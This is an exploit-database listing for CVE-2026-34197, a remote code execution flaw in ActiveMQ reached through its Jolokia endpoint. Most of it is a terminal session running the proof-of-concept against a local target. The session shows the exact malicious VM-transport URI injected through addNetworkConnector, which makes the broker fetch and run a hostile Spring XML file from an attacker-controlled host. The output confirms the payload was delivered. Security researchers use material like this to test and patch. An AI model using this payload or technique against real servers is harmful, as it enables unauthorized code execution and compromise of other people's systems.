Exploit for CVE-2026-34197

## https://sploitus.com/exploit?id=830144AF-D83A-57E9-9EF4-75E12C45DA3D
# CVE-2026-34197
CVE-2026-34197 activemq PoC


PoC for the ActiveMQ as per Horizon3 post
https://horizon3.ai/attack-research/disclosures/cve-2026-34197-activemq-rce-jolokia/

```
krasn@icestorm cve-2026-34197-activemq % docker compose up -d
krasn@icestorm cve-2026-34197-activemq % python3 exploit_poc.py auto \
    --target http://localhost:8161 \
    --lhost 192.168.1.17 --lport 9999 \
    --cmd "touch /tmp/blahblah.txt"
======================================================================
  CVE-2026-34197 — ActiveMQ RCE via Jolokia + VM Transport
  For authorized security testing and research only.
======================================================================

[*] Target: http://localhost:8161
[*] Command: touch /tmp/blahblah.txt
[*] Serving malicious Spring XML on http://0.0.0.0:9999/evil.xml
[+] Jolokia accessible — agent version: unknown
[*] Could not discover broker name, using default 'localhost'
[*] Sending exploit payload to http://localhost:8161/api/jolokia/
[*] Malicious URI: static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Jolokia returned 200 — exploit payload delivered
[+] Response: {
  "request": {
    "mbean": "org.apache.activemq:brokerName=localhost,type=Broker",
    "arguments": [
      "static:(vm://evil?brokerConfig=xbean:http://192.168.1.17:9999/evil.xml)"
    ],
    "type": "exec",
    "operation": "addNetworkConnector(java.lang.String)"
  },
  "value": "NC",
  "timestamp": 1775616523,
  "status": 200
}
[*] Waiting 5s for target to fetch payload...
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Target fetched payload: /evil.xml
[+] Done. Verify command execution on target.
```